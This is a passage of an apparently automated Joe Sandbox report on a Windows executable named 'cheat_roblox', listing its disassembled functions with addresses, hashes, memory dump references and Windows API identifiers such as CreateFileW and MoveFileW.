                                                                                                                  • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                  • Instruction Fuzzy Hash: 4BD1AF73B1828A87DB24CF55F1847AAB7A5FB98784F048134CB9E97B44DE3DE8418B05
                                                                                                                  Function 00007FF6E7E1B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1365068426-0
                                                                                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                                                  • Instruction ID: 07f8431c593f1906589d6abcf2038f3a2ae7bb22466e71d178eaed2620f9108a
                                                                                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                                                  • Instruction Fuzzy Hash: 2401A23270C74282E7108F26F85127A6391FB89BC4F484134EADD87B44CF3DD5048749
                                                                                                                  Function 00007FF6E7E4FCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  • API String ID: 0-248832578
                                                                                                                  • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                                                  • Instruction ID: 6297d0a76646ac35068ba67230c77737e52b49ef68f8fdd431cdcd255de895fa
                                                                                                                  • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                                                  • Instruction Fuzzy Hash: 9C312A23B0869545EB248B36E8047B96A91AB44FE4F088234DEBC87BC6DF3DD5038309
                                                                                                                  Function 00007FF6E7E55AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 15204871-0
                                                                                                                  • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                                                  • Instruction ID: a2160a87bcf8a31fc67185891575dfb6e0061e7b133a353c5f237299a7a22091
                                                                                                                  • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                                                  • Instruction Fuzzy Hash: 43B15A73600B898BEB15CF29D84636C3BA1F784B88F198921DAAD877A4CF3ED451D705
                                                                                                                  Function 00007FF6E7E38DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1061551593-0
                                                                                                                  • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                                                  • Instruction ID: a6b83e9d9062ac436e4b299c26c3f639ba33e2ee2ce36c51ff06a30f172c82df
                                                                                                                  • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                                                  • Instruction Fuzzy Hash: 50813937B18A0586EB20CF6AE8446AD3771FB88B88F004122DE9D97B64DF3ED545C785
                                                                                                                  Function 00007FF6E7E3A2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169056816-0
                                                                                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                                  • Instruction ID: e99cd1b590a9183151074b9b2bbc44def489fa85369a4f65d4758dc520944957
                                                                                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                                  • Instruction Fuzzy Hash: FB116A22A18B8595E261CB51F4003A97360FF88B84F844031DB9C83664EF3DD645C74A
                                                                                                                  Function 00007FF6E7E2126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: CreateFileW.KERNELBASE ref: 00007FF6E7E2259B
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: GetLastError.KERNEL32 ref: 00007FF6E7E225AE
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: CreateFileW.KERNEL32 ref: 00007FF6E7E2260E
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: GetLastError.KERNEL32 ref: 00007FF6E7E22617
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E215D0
                                                                                                                    • Part of subcall function 00007FF6E7E23980: MoveFileW.KERNEL32 ref: 00007FF6E7E239BD
                                                                                                                    • Part of subcall function 00007FF6E7E23980: MoveFileW.KERNEL32 ref: 00007FF6E7E23A34
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 34527147-0
                                                                                                                  • Opcode ID: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
                                                                                                                  • Instruction ID: e50a325ff11e799ff2a6d76d2fbb6735ec17c046796f1a4bbc7b4f62bfe576fa
                                                                                                                  • Opcode Fuzzy Hash: b6c9c40237190830a1427cc90f699f3ed679a8c4b0b9819d305839f030af1316
                                                                                                                  • Instruction Fuzzy Hash: 5D91CF23B18A8682EB10DB66E4443BE6361FB94BC4F414032EE9D87B95DE3EDA45C345
                                                                                                                  Function 00007FF6E7E251A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                                  • Instruction ID: 9690ba88e27defc56cca739332b2005497eaf92da2f69a13c1e50eb12c2df162
                                                                                                                  • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                                  • Instruction Fuzzy Hash: 1C011373A186828AF6648B04E85177A33A1BBD8314F600234D6ADC3790EF3EF5018A0A
                                                                                                                  Function 00007FF6E7E48C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                  • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                                                  • Instruction ID: 94426867f7315b7fa30c8f6928cf1eae55353f72bf7f887e7f7594ff037eb5d2
                                                                                                                  • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                                                  • Instruction Fuzzy Hash: B681F223A1924242EEB88B25C44077D2294EF61B44F141531DDA9DBA95EF3FE847F38B
                                                                                                                  Function 00007FF6E7E489A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                  • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                  • Instruction ID: 0797b9b627c6010631aed52dc12c3c3ce8747f8b4b8efed2d173851599bcf88b
                                                                                                                  • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                  • Instruction Fuzzy Hash: A871E623A0C24246FBA88B19D04437D23909F41744F141931DEE9D7A96EE6FE847B7CB
                                                                                                                  Function 00007FF6E7E2C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 0-4203073231
                                                                                                                  • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                                                  • Instruction ID: 198facd1b5ca2524e64c1fbd76e9c279d6f0e8c6d318c5de192c94f275640fac
                                                                                                                  • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                                                  • Instruction Fuzzy Hash: B051A037B286908BD724CF25E400A9E73A5F388798F045126EF9A93B08CB3DE945CF40
                                                                                                                  Function 00007FF6E7E4C838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                                                  • Instruction ID: f7d844031a393bc1022637320a10384089f3da2222ed45452dec13058040870d
                                                                                                                  • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                                                  • Instruction Fuzzy Hash: EE41BC33724A4886EA04CF2AE8152A977A1A758FD0B5D9036DFADCB764EE3DD142C304
                                                                                                                  Function 00007FF6E7E50D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                                  • Instruction ID: 74d51a65190dbc68581c9a63ed405c3b30c190da509c713c905b4b96b40861d0
                                                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                                  • Instruction Fuzzy Hash: 35B09221E17A06C2EA082B15BC8235422A4BF58B00F948078C19C82320DE2E20A58706
                                                                                                                  Function 00007FF6E7E33964 Relevance: .9, Instructions: 931COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                                                                  • Instruction ID: 43960feb6118644e15be28498b5f620de752477fe479e8e68eb1494a29b206ab
                                                                                                                  • Opcode Fuzzy Hash: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                                                                  • Instruction Fuzzy Hash: 478225A3A097C196D715CF24D4087BC3BA1E752F88F198136CAAE873A5DE3ED846C315
                                                                                                                  Function 00007FF6E7E176C0 Relevance: .9, Instructions: 893COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                                                  • Instruction ID: 6dd67302250babf6278ae64aeaa6b0301743f170119f09c0484388a3a365c504
                                                                                                                  • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                                                  • Instruction Fuzzy Hash: 6E627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                                                  Function 00007FF6E7E353F0 Relevance: .9, Instructions: 891COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                                                                  • Instruction ID: 3b4d8f0424c4a9d1eb0477913615e35027d3107828c13b3530bc81c6fa38950b
                                                                                                                  • Opcode Fuzzy Hash: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                                                                  • Instruction Fuzzy Hash: C68201B3A096C09AD724CF38C4087FC77A1E755B48F188136CAAE87799CE3E9445D716
                                                                                                                  Function 00007FF6E7E2BB90 Relevance: .6, Instructions: 587COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
